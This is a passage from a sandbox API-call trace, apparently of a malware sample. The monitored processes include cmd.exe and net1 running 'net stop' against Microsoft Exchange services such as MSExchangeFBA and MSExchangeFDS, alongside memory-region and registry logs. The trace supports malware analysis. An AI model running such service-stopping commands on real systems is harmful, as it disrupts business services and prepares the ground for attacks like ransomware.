[0136.018] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x806c88 [0136.018] OpenServiceW (hSCManager=0x806c88, lpServiceName="MSEXCHANGEFDS", dwDesiredAccess=0x84) returned 0x0 [0136.018] GetLastError () returned 0x424 [0136.018] CloseServiceHandle (hSCObject=0x806c88) returned 1 [0136.018] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0136.018] LoadLibraryW (lpLibFileName="NETMSG") returned 0x770000 [0136.019] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0136.020] GetFileType (hFile=0x40) returned 0x2 [0136.020] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x6ff580 | out: lpMode=0x6ff580) returned 1 [0136.020] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x6ff58c, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x6ff58c*=0x1e) returned 1 [0136.020] GetFileType (hFile=0x40) returned 0x2 [0136.020] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x6ff580 | out: lpMode=0x6ff580) returned 1 [0136.021] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6ff58c, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x6ff58c*=0x2) returned 1 [0136.021] _ultow (in: _Dest=0x889, _Radix=7337376 | out: _Dest=0x889) returned="2185" [0136.021] FormatMessageW (in: dwFlags=0x2800, lpSource=0x770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0136.021] GetFileType (hFile=0x40) returned 0x2 [0136.021] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x6ff570 | out: lpMode=0x6ff570) returned 1 [0136.021] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x6ff57c, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x6ff57c*=0x34) returned 1 [0136.021] GetFileType (hFile=0x40) returned 0x2 [0136.021] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x6ff570 | out: lpMode=0x6ff570) returned 1 [0136.021] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6ff57c, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x6ff57c*=0x2) returned 1 [0136.022] NetApiBufferFree (Buffer=0x808150) returned 0x0 [0136.022] NetApiBufferFree (Buffer=0x808120) returned 0x0 [0136.022] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeFDS" [0136.022] exit (_Code=2) Thread: id = 621 os_tid = 0xee0 Process: id = "201" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xf23a000" os_pid = "0xe74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeFBA" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10100 start_va = 0x200000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 10101 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 10102 start_va = 0x230000 end_va = 0x243fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 10103 start_va = 0x250000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 10104 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 10105 start_va = 0x390000 end_va = 0x393fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 10106 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 10107 start_va = 0x3b0000 end_va = 0x3b1fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 10108 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 10109 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 10110 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10111 start_va = 0x7f360000 end_va = 0x7f382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f360000" filename = "" Region: id = 10112 start_va = 0x7f38b000 end_va = 0x7f38dfff entry_point = 0x0 region_type = private name = "private_0x000000007f38b000" filename = "" Region: id = 10113 start_va = 0x7f38e000 end_va = 0x7f38efff entry_point = 0x0 region_type = private name = "private_0x000000007f38e000" filename = "" Region: id = 10114 start_va = 0x7f38f000 end_va = 0x7f38ffff entry_point = 0x0 region_type = private name = "private_0x000000007f38f000" filename = "" Region: id = 10115 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10116 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10117 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10118 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10119 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10120 start_va = 0x4560000 end_va = 0x456ffff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 10121 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10122 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10123 start_va = 0x4430000 end_va = 0x452ffff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 10124 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10165 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 10166 start_va = 0x4570000 end_va = 0x462dfff entry_point = 0x4570000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10167 start_va = 0x4630000 end_va = 0x466ffff entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 10168 start_va = 0x4670000 end_va = 0x476ffff entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 10169 start_va = 0x47e0000 end_va = 0x47effff entry_point = 0x0 region_type = private name = "private_0x00000000047e0000" filename = "" Region: id = 10170 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10171 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10172 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10173 start_va = 0x7f260000 end_va = 0x7f35ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f260000" filename = "" Region: id = 10174 start_va = 0x7f388000 end_va = 0x7f38afff entry_point = 0x0 region_type = private name = "private_0x000000007f388000" filename = "" Region: id = 10175 start_va = 0x210000 end_va = 0x213fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 10176 start_va = 0x220000 end_va = 0x223fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 10177 start_va = 0x47f0000 end_va = 0x4b26fff entry_point = 0x47f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 622 os_tid = 0xf1c [0136.194] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0136.194] __set_app_type (_Type=0x1) [0136.194] __p__fmode () returned 0x77ac4d6c [0136.194] __p__commode () returned 0x77ac5b1c [0136.195] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0136.195] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0136.195] GetCurrentThreadId () returned 0xf1c [0136.195] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf1c) returned 0x84 [0136.195] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0136.195] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0136.195] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.198] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.198] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x38fbb8 | out: phkResult=0x38fbb8*=0x0) returned 0x2 [0136.198] VirtualQuery (in: lpAddress=0x38fbbf, lpBuffer=0x38fb70, dwLength=0x1c | out: lpBuffer=0x38fb70*(BaseAddress=0x38f000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.198] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x38fb70, dwLength=0x1c | out: lpBuffer=0x38fb70*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.198] VirtualQuery (in: lpAddress=0x291000, lpBuffer=0x38fb70, dwLength=0x1c | out: lpBuffer=0x38fb70*(BaseAddress=0x291000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.198] VirtualQuery (in: lpAddress=0x293000, lpBuffer=0x38fb70, dwLength=0x1c | out: lpBuffer=0x38fb70*(BaseAddress=0x293000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.198] VirtualQuery (in: lpAddress=0x390000, lpBuffer=0x38fb70, dwLength=0x1c | out: lpBuffer=0x38fb70*(BaseAddress=0x390000, AllocationBase=0x390000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.198] GetConsoleOutputCP () returned 0x1b5 [0136.199] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0136.199] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0136.199] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.199] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0136.199] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.199] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0136.199] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.199] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0136.200] _get_osfhandle (_FileHandle=0) returned 0x38 [0136.200] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0136.200] _get_osfhandle (_FileHandle=0) returned 0x38 [0136.200] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0136.200] GetEnvironmentStringsW () returned 0x4437d60* [0136.200] FreeEnvironmentStringsA (penv="A") returned 1 [0136.200] GetEnvironmentStringsW () returned 0x4437d60* [0136.201] FreeEnvironmentStringsA (penv="A") returned 1 [0136.201] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x38eb1c | out: phkResult=0x38eb1c*=0x94) returned 0x0 [0136.201] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x38eb20, lpData=0x38eb28, lpcbData=0x38eb24*=0x1000 | out: lpType=0x38eb20*=0x0, lpData=0x38eb28*=0xc8, lpcbData=0x38eb24*=0x1000) returned 0x2 [0136.201] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x38eb20, lpData=0x38eb28, lpcbData=0x38eb24*=0x1000 | out: lpType=0x38eb20*=0x4, lpData=0x38eb28*=0x1, lpcbData=0x38eb24*=0x4) returned 0x0 [0136.201] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x38eb20, lpData=0x38eb28, lpcbData=0x38eb24*=0x1000 | out: lpType=0x38eb20*=0x0, lpData=0x38eb28*=0x1, lpcbData=0x38eb24*=0x1000) returned 0x2 [0136.201] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x38eb20, lpData=0x38eb28, lpcbData=0x38eb24*=0x1000 | out: lpType=0x38eb20*=0x4, lpData=0x38eb28*=0x0, lpcbData=0x38eb24*=0x4) returned 0x0 [0136.201] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x38eb20, lpData=0x38eb28, lpcbData=0x38eb24*=0x1000 | out: lpType=0x38eb20*=0x4, lpData=0x38eb28*=0x40, lpcbData=0x38eb24*=0x4) returned 0x0 [0136.201] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x38eb20, lpData=0x38eb28, lpcbData=0x38eb24*=0x1000 | out: lpType=0x38eb20*=0x4, lpData=0x38eb28*=0x40, lpcbData=0x38eb24*=0x4) returned 0x0 [0136.201] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x38eb20, lpData=0x38eb28, lpcbData=0x38eb24*=0x1000 | out: lpType=0x38eb20*=0x0, lpData=0x38eb28*=0x40, lpcbData=0x38eb24*=0x1000) returned 0x2 [0136.201] RegCloseKey (hKey=0x94) returned 0x0 [0136.201] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x38eb1c | out: phkResult=0x38eb1c*=0x94) returned 0x0 [0136.201] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x38eb20, lpData=0x38eb28, lpcbData=0x38eb24*=0x1000 | out: lpType=0x38eb20*=0x0, lpData=0x38eb28*=0x40, lpcbData=0x38eb24*=0x1000) returned 0x2 [0136.201] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x38eb20, lpData=0x38eb28, lpcbData=0x38eb24*=0x1000 | out: lpType=0x38eb20*=0x4, lpData=0x38eb28*=0x1, lpcbData=0x38eb24*=0x4) returned 0x0 [0136.201] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x38eb20, lpData=0x38eb28, lpcbData=0x38eb24*=0x1000 | out: lpType=0x38eb20*=0x0, lpData=0x38eb28*=0x1, lpcbData=0x38eb24*=0x1000) returned 0x2 [0136.201] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x38eb20, lpData=0x38eb28, lpcbData=0x38eb24*=0x1000 | out: lpType=0x38eb20*=0x4, lpData=0x38eb28*=0x0, lpcbData=0x38eb24*=0x4) returned 0x0 [0136.201] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x38eb20, lpData=0x38eb28, lpcbData=0x38eb24*=0x1000 | out: lpType=0x38eb20*=0x4, lpData=0x38eb28*=0x9, lpcbData=0x38eb24*=0x4) returned 0x0 [0136.201] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x38eb20, lpData=0x38eb28, lpcbData=0x38eb24*=0x1000 | out: lpType=0x38eb20*=0x4, lpData=0x38eb28*=0x9, lpcbData=0x38eb24*=0x4) returned 0x0 [0136.201] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x38eb20, lpData=0x38eb28, lpcbData=0x38eb24*=0x1000 | out: lpType=0x38eb20*=0x0, lpData=0x38eb28*=0x9, lpcbData=0x38eb24*=0x1000) returned 0x2 [0136.201] RegCloseKey (hKey=0x94) returned 0x0 [0136.201] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29839 [0136.201] srand (_Seed=0x5ad29839) [0136.201] GetCommandLineW () returned="/c net stop MSExchangeFBA" [0136.201] GetCommandLineW () returned="/c net stop MSExchangeFBA" [0136.202] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0136.202] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4439cb8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0136.202] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0136.202] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.202] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.202] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.202] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.202] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.202] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.202] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.202] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.202] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.202] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.202] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.202] GetEnvironmentStringsW () returned 0x4437d60* [0136.202] FreeEnvironmentStringsA (penv="A") returned 1 [0136.202] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.203] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.203] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.203] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.203] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.203] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.203] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.203] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.203] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.203] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.203] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x38f8f4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0136.203] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x38f8f4, lpFilePart=0x38f8ec | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x38f8ec*="Desktop") returned 0x1d [0136.203] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0136.203] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x38f670 | out: lpFindFileData=0x38f670) returned 0x44305c8 [0136.203] FindClose (in: hFindFile=0x44305c8 | out: hFindFile=0x44305c8) returned 1 [0136.203] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x38f670 | out: lpFindFileData=0x38f670) returned 0x44305c8 [0136.203] FindClose (in: hFindFile=0x44305c8 | out: hFindFile=0x44305c8) returned 1 [0136.203] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0136.203] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x38f670 | out: lpFindFileData=0x38f670) returned 0x44305c8 [0136.204] FindClose (in: hFindFile=0x44305c8 | out: hFindFile=0x44305c8) returned 1 [0136.204] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0136.204] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0136.204] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0136.204] GetEnvironmentStringsW () returned 0x4437d60* [0136.204] FreeEnvironmentStringsA (penv="=") returned 1 [0136.204] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0136.204] GetConsoleOutputCP () returned 0x1b5 [0136.205] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0136.205] GetUserDefaultLCID () returned 0x409 [0136.206] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0136.206] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x38fa24, cchData=128 | out: lpLCData="0") returned 2 [0136.206] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x38fa24, cchData=128 | out: lpLCData="0") returned 2 [0136.206] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x38fa24, cchData=128 | out: lpLCData="1") returned 2 [0136.206] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0136.206] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0136.206] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0136.206] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0136.206] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.206] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0136.206] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0136.206] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0136.206] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0136.206] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0136.206] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.207] GetConsoleTitleW (in: lpConsoleTitle=0x443a9e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.207] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0136.207] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0136.207] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0136.207] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0136.208] _wcsicmp (_String1="net", _String2=")") returned 69 [0136.208] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0136.208] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0136.208] _wcsicmp (_String1="IF", _String2="net") returned -5 [0136.208] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0136.208] _wcsicmp (_String1="REM", _String2="net") returned 4 [0136.208] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0136.209] GetConsoleTitleW (in: lpConsoleTitle=0x38f710, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.209] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0136.209] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0136.209] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0136.209] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0136.209] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0136.209] _wcsicmp (_String1="net", _String2="CD") returned 11 [0136.209] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0136.209] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0136.209] _wcsicmp (_String1="net", _String2="REN") returned -4 [0136.209] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0136.209] _wcsicmp (_String1="net", _String2="SET") returned -5 [0136.209] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0136.209] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0136.210] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0136.210] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0136.210] _wcsicmp (_String1="net", _String2="MD") returned 1 [0136.210] _wcsicmp (_String1="net", 